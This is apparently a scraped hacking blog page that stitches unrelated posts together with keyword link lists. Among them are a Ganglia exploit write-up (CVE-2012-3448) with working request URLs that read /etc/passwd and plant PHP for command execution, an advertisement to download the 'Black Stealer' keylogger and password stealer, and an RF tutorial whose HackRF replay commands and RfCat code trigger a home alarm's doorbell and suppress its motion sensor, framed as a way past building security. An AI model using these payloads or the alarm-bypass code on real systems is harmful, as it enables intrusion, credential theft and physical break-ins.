British Airline EasyJet Suffers Data Breach Exposing 9 Million Customers' Data

British low-cost airline EasyJet today admitted that the company has fallen victim to a cyber-attack, which it labeled "highly sophisticated," exposing email addresses and travel details of around 9 million of its customers. In an official statement released today, EasyJet confirmed that of the 9 million affected users, a small subset of customers, i.e., 2,208 customers, have also had their

via The Hacker News

This article is the property of Tenochtitlan Offensive Security. Verlo Completo --> https://tenochtitlan-sec.blogspot.com

More info

1. Hacking Pdf
2. Foro Hacking
3. Cosas De Hackers
4. Hacking Games Online
5. Programas De Hacker
6. Linux Hacking
7. Tecnicas De Hacking
8. Hacking Wifi
9. Tecnicas De Hacking
10. Hacking Xbox One
11. Como Ser Hacker

Top 10 Most Popular Ethical Hacking Tools (2019 Ranking)

     Top 10 powerful Hacking  Tools in 2019.       

If hacking is performed to identify the potential threats to a computer or network then it will be an ethical hacking.

Ethical hacking is also called penetration testing, intrusion testing, and red teaming.

Hacking is the process of gaining access to a computer system with the intention of fraud, data stealing, and privacy invasion etc., by identifying its weaknesses.

Ethical Hackers:

A person who performs the hacking activities is called a hacker.

There are six types of hackers:

• The Ethical Hacker (White hat)
• Cracker
• Grey hat
• Script kiddies
• Hacktivist
• Phreaker

A security professional who uses his/her hacking skills for defensive purposes is called an ethical hacker. To strengthen the security, ethical hackers use their skills to find vulnerabilities, document them, and suggest the ways to rectify them.

Companies that provide online services or those which are connected to the internet, must perform penetration testing by ethical hackers. Penetration testing is another name of ethical hacking. It can be performed manually or through an automation tool.

Ethical hackers work as an information security expert. They try to break the security of a computer system, network, or applications. They identify the weak points and based on that, they give advice or suggestions to strengthen the security.

Programming languages that are used for hacking include PHP, SQL, Python, Ruby, Bash, Perl, C, C++, Java, VBScript, Visual Basic, C Sharp, JavaScript, and HTML.

Few Hacking Certifications include:

1. CEH
2. GIAC
3. OSCP
4. CREST

Let's Explore!!

#1) Nmap

Price: Free

Description:

Nmap is a security scanner, port scanner, as well as a network exploration tool. It is an open source software and is available for free.

It supports cross-platform. It can be used for network inventory, managing service upgrade schedules, and for monitoring host & service uptime. It can work for a single host as well as large networks. It provides binary packages for Linux, Windows, and Mac OS X.

Features: 

• Nmap suite has:
  • Data transfer, redirection, and debugging tool(Ncat),
  • Scan results comparing utility(Ndiff),
  • Packet generation and response analysis tool (Nping),
  • GUI and Results viewer (Nping)
• Using raw IP packets it can determine:
  • The available hosts on the network.
  • Their services offered by these available hosts.
  • Their OS.
  • Packet filters they are using.
  • And many other characteristics.

Best for: Nmap is best for scanning network. It is easy to use and fast as well.

Website: Nmap

******************

#2) Netsparker

Netsparker is a dead accurate ethical hacking tool, that mimics a hacker's moves to identify vulnerabilities such as SQL Injection and Cross-site Scripting in web applications and web APIs. 

 

Netsparker uniquely verifies the identified vulnerabilities proving they are real and not false positives, so you do not need to waste hours manually verifying the identified vulnerabilities once a scan is finished.

 

It is available as a Windows software and an online service.

=> Visit Netsparker Website Here

******************

#3) Acunetix 

Acunetix is a fully automated ethical hacking tool that detects and reports on over 4500 web application vulnerabilities including all variants of SQL Injection and XSS.

The Acunetix crawler fully supports HTML5 and JavaScript and Single-page applications, allowing auditing of complex, authenticated applications.

It bakes in advanced Vulnerability Management features right-into its core, prioritizing risks based on data through a single, consolidated view, and integrating the scanner's results into other tools and platforms.

=> Visit Acunetix Official Website

******************

#4) Metasploit

Price: Metasploit Framework is an open source tool and it can be downloaded for free. Metasploit Pro is a commercial product. Its free trial is available for 14 days. Contact the company to know more about its pricing details.

Description:

It is the software for penetration testing. Using Metasploit Framework, you can develop and execute exploit code against a remote machine. It supports cross-platform.

Features: 

• It is useful for knowing about security vulnerabilities.
• Helps in penetration testing.
• Helps in IDS signature development.
• You can create security testing tools.

Best For Building anti-forensic and evasion tools.

Website: Metasploit

#5) Aircrack-Ng

Price: Free

Description:

Aircrack-ng provides different tools for evaluating Wi-Fi network security.

All are command line tools. For Wi-Fi security, it focuses on monitoring, attacking, testing, and cracking. It supports Linux, Windows, OS X, Free BSD, NetBSD, OpenBSD, Solaris, and eComStation 2.

Features:

• Aircrack-ng can focus on Replay attacks, de-authentication, fake access points, and others.
• It supports exporting data to text files.
• It can check Wi-Fi cards and driver capabilities.
• It can crack WEP keys and for that, it makes use of FMS attack, PTW attack, and dictionary attacks.
• It can crack WPA2-PSK and for that, it makes use of dictionary attacks.

Best For: Supports any wireless network interface controller.

Website: Aircrack-Ng

#6) Wireshark

Price: Free

Description:

Wireshark is a packet analyzer and can perform deep inspection of many protocols.

It supports cross-platform. It allows you to export the output to different file formats like XML, PostScript, CSV, and Plaintext. It provides the facility to apply coloring rules to packet list so that analysis will be easier and quicker. The above image will show the capturing of packets.

Features:

• It can decompress the gzip files on the fly.
• It can decrypt many protocols like IPsec, ISAKMP, and SSL/TLS etc.
• It can perform live capture and offline analysis.
• It allows you to browse the captured network data using GUI or TTY-mode TShark utility.

Best For: Analyzing data packets.

Website: Wireshark

#7) Ettercap

Price: Free.

Description:

Ettercap supports cross-platform. Using Ettercap's API, you can create custom plugins. Even with the proxy connection, it can do sniffing of HTTP SSL secured data.

Features:

• Sniffing of live connections.
• Content filtering.
• Active and passive dissection of many protocols.
• Network and host analysis.

Best For: It allows you to create custom plugins.

Website: Ettercap

#8) Maltego

Price: The Community version, Maltego CE is available for free. Price for Maltego Classic is $999. Price for Maltego XL is $1999. These two products are for the desktop. Price for the server products like CTAS, ITDS, and Comms starts at $40000, which includes training as well.

Description:

Maltego is a tool for link analysis and data mining. It supports Windows, Linux, and Mac OS.

For the discovery of data from open sources and visualizing the information in graphical format, it provides the library of transforms. It performs real-time data-mining and information gathering.

Features:

• Represents the data on node-based graph patterns.
• Maltego XL can work with large graphs.
• It will provide you the graphical picture, thereby telling you about the weak points and abnormalities of the network.

Best For: It can work with very large graphs.

Website: Maltego

#9) Nikto

Price: Free

Description:

Nikto is an open source tool for scanning the web server.

It scans the web server for dangerous files, outdated versions, and particular version related problems. It saves the report in a text file, XML, HTML, NBE, and CSV file formats. Nikto can be used on the system which supports basic Perl installation. It can be used on Windows, Mac, Linux, and UNIX systems.

Features:

• It can check web servers for over 6700 potentially dangerous files.
• It has full HTTP proxy support.
• Using Headers, favicons, and files, it can identify the installed software.
• It can scan the server for outdated server components.

Best For: As a Penetration Testing tool.

Website: Nikto

#10) Burp Suite

Price: It has three pricing plans. Community edition can be downloaded for free. Pricing for Enterprise edition starts at $3999 per year. Price of the Professional edition starts at $399 per user per year.

Description:

Burp Suite has a web vulnerability scanner and has advanced and essential manual tools.

It provides many features for web application security. It has three editions, community, enterprise, and professional. With community editions, it provides essential manual tools. With the paid versions it provides more features like Web vulnerabilities scanner.

Features:

• It allows you to schedule and repeats the scan.
• It scans for 100 generic vulnerabilities.
• It uses out-of-band techniques (OAST).
• It provides detailed custom advisory for the reported vulnerabilities.
• It provides CI Integration.

Best For: Security testing.

Website: Burp Suite

#11) John The Ripper

Price: Free

Description:

John the Ripper is a tool for password cracking. It can be used on Windows, DOS, and Open VMS. It is an open source tool. It is created for detecting weak UNIX passwords.

Features:

• John the Ripper can be used to test various encrypted passwords.
• It performs dictionary attacks.
• It provides various password crackers in one package.
• It provides a customizable cracker.

Best For: It is fast in password cracking.

Website:  John the Ripper

#12) Angry IP Scanner

Price: Free

Description:

Angry IP Scanner is a tool for scanning the IP addresses and ports. It can scan both on local network and Internet. It supports Windows, Mac, and Linux operating systems.

Features:

• It can export the result in many formats.
• It is a command-line interface tool.
• It is extensible with many data fetchers.

Website:  Angry IP Scanner

Conclusion

As explained here, Nmap is used for computer security and network management. It is good for scanning the network. Metasploit is also for security and is good for building anti-forensic and evasion tools.

Aircrack-Ng is a free packet sniffer & injector and supports cross-platform. Wireshark is a packet analyzer and is good in analyzing data packets. As per the reviews available online, people recommend using Nmap instead of Angry IP scanner as Angry IP Scanner comes with unwanted applications.

John the Ripper is fast in password cracking. Nikto is a good open source tool for penetration testing. Maltego presents the data in a graphical form and will give you information about weak points and abnormalities.

This was all about the ethical hacking and the top ethical hacking tools. Hope you will find this article to be much useful!!

@EVERYTHING NT

Related links

• Hacking The Art Of Exploitation
• Hacking Academy
• Hacker Definicion Informatica
• Como Hackear
• Curso De Hacker Gratis Desde Cero
• Software Hacking
• Hacking Etico
• Amiibo Hacking
• Capture The Flag Hacking
• Hacking System
• Que Estudia Un Hacker

Extending Your Ganglia Install With The Remote Code Execution API

Previously I had gone over a somewhat limited local file include in the Ganglia monitoring application (http://ganglia.info). The previous article can be found here -
http://console-cowboys.blogspot.com/2012/01/ganglia-monitoring-system-lfi.html

I recently grabbed the latest version of the Ganglia web application to take a look to see if this issue has been fixed and I was pleasantly surprised... github is over here -
https://github.com/ganglia/ganglia-web
Looking at the code the following (abbreviated "graph.php") sequence can be found -

$graph = isset($_GET["g"])  ?  sanitize ( $_GET["g"] )   : "metric";
....
$graph_arguments = NULL;
$pos = strpos($graph, ",");
$graph_arguments = substr($graph, $pos + 1);
....
eval('$graph_function($rrdtool_graph,' . $graph_arguments . ');');


I can only guess that this previous snippet of code was meant to be used as some sort of API put in place for remote developers, unfortunately it is slightly broken. For some reason when this API was being developed part of its interface was wrapped in the following function -

function sanitize ( $string ) {
  return  escapeshellcmd( clean_string( rawurldecode( $string ) ) ) ;
}


According the the PHP documentation -
Following characters are preceded by a backslash: #&;`|*?~<>^()[]{}$\, \x0A and \xFF. ' and " are escaped only if they are not paired. In Windows, all these characters plus % are replaced by a space instead.


This limitation of the API means we cannot simply pass in a function like eval, exec, system, or use backticks to create our Ganglia extension. Our only option is to use PHP functions that do not require "(" or ")" a quick look at the available options (http://www.php.net/manual/en/reserved.keywords.php) it looks like "include" would work nicely. An example API request that would help with administrative reporting follows:
http://192.168.18.157/gang/graph.php?g=cpu_report,include+'/etc/passwd'

Very helpful, we can get a nice report with a list of current system users. Reporting like this is a nice feature but what we really would like to do is create a new extension that allows us to execute system commands on the Ganglia system. After a brief examination of the application it was found that we can leverage some other functionality of the application to finalize our Ganglia extension. The "events" page allows for a Ganglia user to configure events in the system, I am not exactly sure what type of events you would configure, but I hope that I am invited.

As you can see in the screen shot I have marked the "Event Summary" with "php here". When creating our API extension event we will fill in this event with the command we wish to run, see the following example request -
http://192.168.18.157/gang/api/events.php?action=add&summary=<%3fphp+echo+`whoami`%3b+%3f>&start_time=07/01/2012%2000:00%20&end_time=07/02/2012%2000:00%20&host_regex=

This request will set up an "event" that will let everyone know who you are, that would be the friendly thing to do when attending an event. We can now go ahead and wire up our API call to attend our newly created event. Since we know that Ganglia keeps track of all planned events in the following location "/var/lib/ganglia/conf/events.json" lets go ahead and include this file in our API call - 
http://192.168.18.157/gang/graph.php?g=cpu_report,include+'/var/lib/ganglia/conf/events.json'

As you can see we have successfully made our API call and let everyone know at the "event" that our name is "www-data". From here I will leave the rest of the API development up to you. I hope this article will get you started on your Ganglia API development and you are able to implement whatever functionality your environment requires. Thanks for following along.

Update: This issue has been assigned CVE-2012-3448Read more

1. Live Hacking
2. Certificacion Ethical Hacking
3. Libros Hacking
4. Hacking Social
5. Hacking Iphone
6. Hacking Udemy
7. Hacking Iphone
8. Computer Hacking
9. Tools For Hacking Wifi
10. Hacking Language
11. Que Significa Hat
12. Hacking Forums
13. Hacking Cracking
14. Hacking Tor Funciona
15. Hacking Youtube

Support For XXE Attacks In SAML In Our Burp Suite Extension

In this post we present the new version of the Burp Suite extension EsPReSSO - Extension for Processing and Recognition of Single Sign-On Protocols. A DTD attacker was implemented on SAML services that was based on the DTD Cheat Sheet by the Chair for Network and Data Security (https://web-in-security.blogspot.de/2016/03/xxe-cheat-sheet.html). In addition, many fixes were added and a new SAML editor was merged. You can find the newest version release here: https://github.com/RUB-NDS/BurpSSOExtension/releases/tag/v3.1

New SAML editor

Before the new release, EsPReSSO had a simple SAML editor where the decoded SAML messages could be modified by the user. We extended the SAML editor so that the user has the possibility to define the encoding of the SAML message and to select their HTTP binding (HTTP-GET or HTTP-POST).

Redesigned SAML Encoder/Decoder

Enhancement of the SAML attacker

XML Signature Wrapping and XML Signature Faking attacks have already been part of the previous EsPReSSO version. Now the user can also perform DTD attacks! The user can select from 18 different attack vectors and manually refine them all before applying the change to the original message. Additional attack vectors can also be added by extending the XML config file of the DTD attacker.
The DTD attacker can also be started in a fully automated mode. This functionality is integrated in the BurpSuite Intruder.

DTD Attacker for SAML messages

Supporting further attacks

We implemented a CertificateViewer which extracts and decodes the certificates contained within the SAML tokens. In addition, a user interface for executing SignatureExclusion attack on SAML has been implemented.

Additional functions will follow in later versions.

Currently we are working on XML Encryption attacks.

This is a combined work from Nurullah Erinola, Nils Engelbertz, David Herring, Juraj Somorovsky, and Vladislav Mladenov.

The research was supported by the European Commission through the FutureTrust project (grant 700542-Future-Trust-H2020-DS-2015-1).

More info

• Libros Hacking Pdf
• Hacking Time
• Growth Hacking Courses
• Hackers Informaticos Contactar

The OWASP Foundation Has Selected The Technical Writer For Google Season Of Docs

The OWASP Foundation has selected the technical writer for Google Season of Docs by Fabio Cerullo

The OWASP Foundation has been accepted as the organization for the Google Seasons of Docs, a project whose goals are to give technical writers an opportunity to gain experience in contributing to open source projects and to give open-source projects an opportunity to engage the technical writing community.

During the program, technical writers spend a few months working closely with an open-source community. They bring their technical writing expertise to the project's documentation, and at the same time learn about open source and new technologies.

The open-source projects work with the technical writers to improve the project's documentation and processes. Together they may choose to build a new documentation set, or redesign the existing docs, or improve and document the open-source community's contribution procedures and onboarding experience. Together, we raise public awareness of open source docs, of technical writing, and of how we can work together to the benefit of the global open source community.

After a careful review and selection process, the OWASP Foundation has picked the primary technical writer who will work along the OWASP ZAP Team for the next 3 months to create the API documentation of this flagship project.

Congratulations to Nirojan Selvanathan!

Please refer to the linked document where you could look at the deliverables and work execution plan.

https://drive.google.com/open?id=1kwxAzaqSuvWhis9Xn1VKNJTJZPM2UV20

More articles

1. Hacking Youtube
2. Password Hacking
3. Hacker En Español
4. Growth Hacking Barcelona
5. Hacking Con Buscadores
6. Growth Hacking Libro
7. Hacking Linux
8. Paginas Para Hackear
9. Hacking Attacks
10. Definicion De Cracker
11. Hacking Hardware Tools
12. Growth Hacking Marketing
13. Hacking News
14. Growth Hacking Barcelona

DOWNLOAD BLACK STEALER V2.1 FULL

BLACK STEALER V2.1 FULL

Black Stealer v2.1 is an advanced keylogger that can steal even saved passwords from the browsers and sends through Email and FTP. It's really easy to the crypt. Keylogger is a computer program that is a type of surveillance technology used to monitor and record each keystroke typed on a specific computer's keyboard by the user, especially in order to gain unauthorized access to the passwords and other confidential information. It's also called a keystroke logger or system monitor. Download black stealer v2.1 full.

DOWNLOAD BLACK STEALER V2.1 FULL

More info

1. Sean Ellis Growth Hacking
2. Hacking Traduccion
3. Hacking Roblox
4. Raspberry Hacking
5. Blog Hacking
6. Como Hackear
7. El Hacker Pelicula
8. Elladodelmal
9. Google Hacking Search
10. Hacking Google Home Mini
11. Hacking Basico
12. Informatico Hacker
13. Manual Del Hacker
14. Social Hacking
15. Hacking Raspberry Pi
16. Curso De Hacking Etico

Hacking Everything With RF And Software Defined Radio - Part 1

This will be a Mini Course on Attacking Devices with RF from a hackers perspective

I wanted to learn about hacking devices using radio frequencies(RF) as their communication mechanism , so I looked around the Internet and only found a few scattered tutorials on random things which were either theoretical or narrowly focused. So I bought some hardware and some tools and decided to figure it out myself. The mission was to go from knowing nothing to owning whatever random devices I could find which offer up a good target with multiple avenues of attack and capability for learning.  The devices and tools needed are posted below. As we attack more devices, we will post more info on those devices.
You can follow us online at the following if your really bored:
Twitter: @Ficti0n , GarrGhar

Site: CCLabs.io

Items needed to Follow Along: 

Purchase Target: 

Home Alert System: https://goo.gl/W56Eau

I settled on hacking a home alert system for the first blog, which contained the following Items: 

• A doorBell
• Motion Sensors with alarm alerts
• Door sensors to alert when the door is opened
• Home Hub Receiver

Purchase Tools Needed: 

HackRF: https://goo.gl/3trM5Q
YardStick: https://goo.gl/wd88sr
RTL SDR: https://goo.gl/B5uUAR

Penetration Testing BrainStorming Session: 

I brainstormed with a friend the following attack avenues for this device: 

• Ring the doorbell  (Our Hello World) 
• Trigger the motion sensors
• Remotely disable the motion sensors
• Jam frequencies for Denial Of Service 

This blog will cover all of the attacks performed, including code, data captures, so you can follow along even if you don't have all of the exact devices but want to play around with it yourself. These are the the topics covered so you can decide if you want to read further or watch the associated videos linked below. 

• Using HackRF for RF Replay attacks 
• Using Yardstick One for Replay attacks 
• Demodulating and decoding signals for use with RF attacks 
• Discovering and troubleshooting issues
• Coding tools in python and RFCat
• RF Jamming Attacks

Video Series PlayList Associated with this blog: 

Initial Profiling of our Device: 

What does our device do in normal operation?   

Taking a look at all the components, there is a receiving station which sets off alarms based on opening doors, motion from a motion sensor and the pressing of a doorbell.  

How do they Connect?

All of these devices are only connected to each other via wireless, they are not connected to any sort of local network or wires. So they are all communicating in an unknown frequency we need determine before we can start hacking them. 

Determining the Frequency: 

To profile our device for the frequency its transmitting on we can use the FCID located on the back of any of the transmitters. We can do this by going to https://fccid.io/ and typing in the FCID from the back of our device. This will provide data sheets, and test reports which contain the information needed to sniff our devices radio transmissions. This site also contains internal device pictures which are useful if you wanted to try hardware hacking. For example looking for Integrated Circuits(IC) numbers or debug interfaces. In this case we only care about the RF frequencies our device is using which happens to be the 315MHz as show below from the fccid website. 

Replay attacks with HackRF To Trigger / Disable Sensors: 

Armed with the frequency range only and no other information we decided to see if we can just blindly capture and replay a transmissions raw form to perform actions without the legitimate transmitters and without understanding anything. 

Below is a photo of the HackRF One hardware used in the first attack and linked above. 

Install HackRF Software: 

Install on OS X for HackRF is as simple as using Brew install, on Linux use the package manager for your distro: 

• brew install hackrf
• Plug in HackRF and type hackrf_info to confirm its working

Our Hello World attack is a simple replay attack of a raw capture to perform a normal operation initiated by HackRF instead of the device. We can perform this attack without understanding anything about the capture and decoding of signals. 

With the HackRF device and 2 simple commands we will capture the transmission and then replay it as if it was from the initial device in its raw format.  The following 2 commands are listed below.  The -r is used to receive and the -t is used to transmit (RX, TX) you will also notice a -R on the transmit command which continuously repeats in TX mode denoted by "Input file end reached. Rewind to beginning" within the transmit output below. We use this in case the first transmission is not seen by the device. The other switches are for gain. 

Simple Replay Commands: 

hackrf_transfer -r connector.raw -f 315000000 -l 24 -g 20

hackrf_transfer -t connector.raw -f 315000000 -x 40 -R

By using these commands we can capture the motion sensor transmission and replay it in raw format to create a false alarm, we can also capture the doorbell transmission and trigger an alarm.  Output of the commands needed to do this are shown below. The video associated with this blog shows the audio and visual output from the alarm system as well as a video form of this blog.  

Receive: (Capture Traffic from HackRF): 

Destroy: ficti0n$ sudo hackrf_transfer -r connector.raw -f 315000000 -l 24 -g 20

call hackrf_set_sample_rate(10000000 Hz/10.000 MHz)

call hackrf_set_freq(315000000 Hz/315.000 MHz)

Stop with Ctrl-C

19.9 MiB / 1.005 sec = 19.8 MiB/second

20.2 MiB / 1.001 sec = 20.2 MiB/second

19.9 MiB / 1.004 sec = 19.9 MiB/second

20.2 MiB / 1.005 sec = 20.1 MiB/second

^CCaught signal 2

 5.2 MiB / 0.257 sec = 20.4 MiB/second

Exiting...

Total time: 4.27196 s

hackrf_stop_rx() done

hackrf_close() done

hackrf_exit() done

fclose(fd) done

exit

Transmit: (Trigger alarm from HackRF) 

Destroy: ficti0n$ sudo hackrf_transfer -t connector.raw -f 315000000 -x 40 -R

call hackrf_set_sample_rate(10000000 Hz/10.000 MHz)

call hackrf_set_freq(315000000 Hz/315.000 MHz)

Stop with Ctrl-C

19.9 MiB / 1.000 sec = 19.9 MiB/second

19.9 MiB / 1.005 sec = 19.8 MiB/second

20.2 MiB / 1.005 sec = 20.1 MiB/second

20.2 MiB / 1.000 sec = 20.2 MiB/second

Input file end reached. Rewind to beginning.

20.2 MiB / 1.005 sec = 20.1 MiB/second

20.2 MiB / 1.001 sec = 20.2 MiB/second

19.9 MiB / 1.005 sec = 19.8 MiB/second

20.2 MiB / 1.000 sec = 20.2 MiB/second

^CCaught signal 2

12.8 MiB / 0.654 sec = 19.7 MiB/second

Exiting...

Total time: 12.68557 s

hackrf_stop_tx() done

hackrf_close() done

hackrf_exit() done

fclose(fd) done

exit

While this is a good POC that we can communicate with the door alert system, this did not provide much of a learning opportunity nor did it drastically reduce the effectiveness of the security system. It only provides false alarms of standard functionality. Lets try doing this the more complicated way by profiling the device a bit more, capturing traffic, reducing the wave patterns to binary, converting to hex and then sending it over another device for a bit more precision and learning opportunity.  This will also open up other attack vectors. This sounds complicated, but honestly its not complicated just a bit tedious to get right at first. 

Further Profiling our Devices Functionality: 

We are easily able to replay functionality when initiating actions ourselves with our HackRF, but what else is going on with the radio transmissions? In order to monitor the transmissions in a very simple way we can use tools such as GQRX with either our HackRF device or an inexpensive SDR Dongle and view the 315MHz radio frequency to see whats happening. 

GQRX Install:

You can grab GQRX from the following location for OSX,  on linux whatever package manager your distro uses should be sufficient for installing GQRX: 

http://gqrx.dk/download

Plug in your SDR dongle of choice (HackRF or RTL-SDR, load up GQRX, and select your device, in this case a cheap 19 dollar RTL SDR: 

Select OK and the interface will load up, I made the following changes.

• I changed the mode under receiver options on the right hand side to AM for Amplitude modulation.
• I changed the MHz at the top to 315000000 since that is what we saw on the fccid.io data sheets. 
• I then hit play and could view the 315 MHz frequency range. 

When triggering any of the transmit devices I saw a spike in the frequency close to the 315 MHz range.  I then held down the doorbell button since this transmit device would just keep replaying over and over while pressed. While this was repeating I dragged the bar to match the frequency exactly. Which was actually roughly 314.991.600 give or take. 

I then triggered the motion sensor and saw a similar spike in frequency, but I also noticed the motion sensor transmitter sends a 2nd transmission after about 6 seconds to shut off the light on the receiver hub that no more motion is happening. A little testing showed this  will disable the alarm from triggering during a limited time period.  

Can we replay the Motion Sensor Turn off?? 

I tried to repeat the simple replay attack of turning off the motion sensor with HackRF, however unless your capture timing is perfect to reduce any extra data the sensor disable is rather spotty and still sometimes triggers an alarm. Even with a short capture the raw file was 40mb in size. If you were to try to breach a building and disable its sensors there is a 50% chance or so the motion sensor will be triggered.  So this is not a sufficient method of disabling the motion sensor alarm. I only want a 100% chance of success if I was to try to bypass a security system.  So we need another technique.  I read online a bit and found something about decoding signal patterns into binary which sounded like a good way to reduce the extra data for a more reliable alarm bypass and decided to start with the simple doorbell as a test due to its ease of use, prior to working with less reliable transmissions based on motion and timing.  

Decoding Signal Patterns for Sending With The YardStick One: 

Below is a picture of the yard Stick tool used in the following attacks

Documented Process: 

Based on my online research in order to capture a signal and retransmit using a yardstick we need to do the following: 

• Record the transmission with the SDR dongle and GQRX
• Demodulate and Decode with Audacity into binary (1s & 0s)
• Convert the Binary to Hex (0x)
• Replay with YardStick in python and RFCat libraries 

Troubleshooting Extra Steps: 

However I found a few issues with this process and added a few more steps below. I am not trying to pretend everything worked perfectly. I ran into a few problems and these trouble shooting steps fixed the issues I ran into and I will list them below and explain them in this section as we walk through the process: 

• Record your YardStick Replay with GQRX and adjust the frequency again based on output
• Compare your transmission waveform to that of the original transmitters waveform to insure your 1's & 0's were calculated properly
• Add some  padding in form of \x00 to the end of your Hex to make it work. 
• Adjust the number of times you repeat your transmissions

Record Transmission with GQRX: 

OK so first things first, load your GQRX application and this time hit the record button at the bottom right side prior to triggering the doorbell transmitter. This will save a Wav file you can open in audacity. 

Install Audacity: 

You can download audacity at the following link for OSX as well as other platforms. http://www.audacityteam.org/download/  You should also be able to use your distro's package management to install this tool if it is not found on the site. 

If you open up your wav file and zoom in a little with Command+1 or the zoom icon you should start to see a repeating pattern similar to this: 

We need to decode one of these to trigger the doorbell. So we will need to zoom in a bit further to see a full representation of one of these patterns.  Once we zoom in a bit more we see the following output which is wave form representation of your transmission. The high points are your 1's and the low points are your 0's: 

Decode to binary: 

So the main issue here is how many 1's and how many 0's are in each peak or valley??   Originally I was thinking that it was something like the following formatted in 8 bit bytes, but this left over an extra 1 which seemed odd so I added 7 0's to make it fit correctly.  (Probably incorrect but hey it worked LOLs) 

10111000 10001011 10111000 10001000 10001011 10111011 10000000

What the above binary means is that the first high peek was One 1 in length, the first low peek was One 0 in length and the larger low and high's were Three 111s in length. This seemed reasonable based on how it looks.  

Try converting it yourself, does it look like my representation above? 

Convert to Hex:

In order to send this to the receiver device we will need to convert it to hex. We can convert this to hex easily online at the following URL: 

http://www.binaryhexconverter.com/binary-to-hex-converter

Or you can use radare2 and easily convert to hex by formatting your input into 8 bit byte segments followed by a "b" for binary as follows and it will spit out some hex values you can then use to reproduce the transmission with the yardstick: 

Destroy:~ ficti0n$ rax2 10111000b 10001011b 10111000b 10001000b 10001011b 10111011b 10000000b

0xb8

0x8b

0xb8

0x88

0x8b

0xbb

0x80

In order to send this with the YardStick you will need to use a python library by the name of RFCat which interfaces with your Yardstick device and can send your Hex data to your receiver.  We can easily do this with python. Even if you do not code it is very simple code to understand.  In order to install RFCat you can do the following on OSX:  (Linux procedures should be the same) 

Install RFCat and Dependencies(libusb, pyusb): 

git clone https://github.com/atlas0fd00m/rfcat.git

cd rfcat/

sudo python setup.py install

cd ../

git clone https://github.com/walac/pyusb.git

cd pyusb/

sudo python setup.py install

easy install pip

pip install libusb

Plug in your device and run the following to verify: 

rfcat -r

Setting up your python Replay Attack: 

First convert our hex from 0xB8 format to \xB8 format and place it in the following code:

Hex Conversion for the python script: 

\xb8\x8b\xb8\x88\x8b\xbb\x80

I provided a few notations under the code to help understanding but its mostly self explanatory: 

#--------Ring the doorbell--------#: 

from rflib import *

d = RfCat()   #1

d.setFreq(315005000)  #2

d.setMdmModulation(MOD_ASK_OOK) #3

d.setMdmDRate(4800) #4 

print "Starting"

d.RFxmit("\xb8\x8b\xb8\x88\x8b\xbb\x80"*10) #5

print 'Transmission Complete'

#--------End Code --------#

#1 Creating a RfCat instance

#2 Setting your Frequency to the capture range from your GQRX output

#3 Setting the modulation type to ASK Amplitude shift keying

#4 Setting your capture rate to that of your GQRX capture settings 

#5 Transmit your Hex 10 times

Ring Doorbell with Yardstick (First Attempt): 

Plug your YardStick into the USB port and run the above code. This will send over your command to ring the doorbell. 

Destroy:ficti0n$ python Door.py

Starting

Transmission Complete

However, this will fail and we have no indication as to why it failed. There are no program errors, or Rfcat errors. The only thing I could think is that that we sent the wrong data, meaning we incorrectly decoded the wave into binary. So I tried a bunch of different variations on the original for example the short lows having Two 1's instead of One and all of these failed when sending with the Yardstick. 

Doorbell with Yardstick (TroubleShooting): 

I needed a better way to figure out what was going on. One way to verify what you sent is to send it again with the Yardstick and capture it with your RTL-SDR device in GQRX. You can then compare the pattern we sent with the yardstick, to the original transmission pattern by the transmitter device. 

The first thing you will notice when we capture a Yardstick transmission is the output is missing the nice spacing between each transmission as there was in the original transmission. This output is all mashed together: 

If we keep zooming in we will see a repeating pattering like the following which is our 10 transmissions repeating over and over: 

If we keep zooming in further we can compare the output from the original capture to the new capture and you will notice it pretty much looks the same other then its hard to get the zoom levels exactly the same in the GUI: 

Hmmm ok so the pattern looks correct but the spacing between patterns is smashed together. After a bit of searching online I came across a piece of code which was unrelated to what I was trying to do but sending RF transmissions with \x00\x00\x00 padding at the end of the hex.  This makes sense in the context of our visual representation above being all mashed up. So I tried this and it still failed.  I then doubled it to 6 \x00's and the doorbell went off. So basically we just needed padding. 

Also I should note that you can put as much padding as you want at the end.. I tried as much as 12 \x00 padding elements and the doorbell still went off. I also then tried a few variations of my binary decoding and some of those which were slightly off actually rang the doorbell. So some variance is tolerated at least with this device.  Below is the working code :)   

Our Hello World test is a SUCCESS. But now we need to move on to something that could bypass the security of the device and cause real world issues. 

The following updated code will ring the doorbell using padding: 

#--------Ring the doorbell--------#: 

from rflib import *

d = RfCat()

d.setFreq(315005000)

d.setMdmModulation(MOD_ASK_OOK)

d.setMdmDRate(4800)

print ("Starting Transmission")

d.RFxmit("\xb8\x8b\xb8\x88\x8b\xbb\x80\x00\x00\x00\x00\x00\x00"*10)

print ("Transmission Complete")

#--------End Code --------#

Disable the Motion Sensor with No Motion Feature:

Ok so originally our simple HackRF replay had about a 50% success rate on turning off the motion sensor due to extraneous data in the transmission replay and timing issues. Lets see if we can get that to 100% with what we learned about decoding from the doorbell. We will instead decode the signal pattern sent from the transmitter to the receiver when shutting off the alert light, but without extra data. We will send it directly with a Yardstick over and over again and potentially use the devices own functionality to disable itself. This would allow us to walk past the motion sensors without setting off an alert. 

The question is can we take the transmission from the Motion Sensor to the Receiver Hub which says motion has ended and use that to disable the Motion Sensor based on a slight delay between saying "there is no motion" and being ready to alert again and bypass the motion sensors security.  Lets give it a try by capturing the "motion has ended" transmission with GQRX when the motion sensor sends its packet to the receiver 6 seconds after initial alert and decode the pattern.. 

Below is a screenshot of the "Motion has ended) transmission in audacity: 

So this sequence was a bit different, there was an opening sequence followed by a repeating sequence.  Lets decode both of these patterns and then determine what we need to send in order to affect the devices motion turnoff functionality.  Below is the zoomed in version of the opening sequence and repeating sequence followed by an estimation of what I think the conversion is. 

The opening sequence appears to have all the highs in single 1's format and most of the lows in 3 000's format, below is the exact conversion that I came up with adding some 0's at the end to make the correct byte length… 

See what you can come up with,  does it match what I have below? 

10001000 10100010 10001010 00101000 10101000 10001010 00101000 10100000

If we convert that to hex we get the following: 

Destroy:ficti0n$ rax2 10001000b 10100010b 10001010b 00101000b 10101000b 10001010b 00101000b 10100000b

0x88

0xa2

0x8a

0x28

0xa8

0x8a

0x28

0xa0

Hex Conversion for the python script: 

\x88\xa2\x8a\x28\xa8\x8a\x28\xa0

Next up is our repeating pattern which has a similar but slightly different structure then the opening pattern. This one starts with a 101 instead of 1000 but still seems to have all of its 1's in single representations and most of its lows in sets of 3 000's. Below the screenshot is the the binary I came up with.. Write it out and see if you get the same thing? 

Repeating Pattern:

10100010 10100010 10001000 10100010 10001010 00101000 10101000 10100010 10001010 00101000

Hex Conversion:  (Used the online tool, R2 didn't like this binary for some reason) 
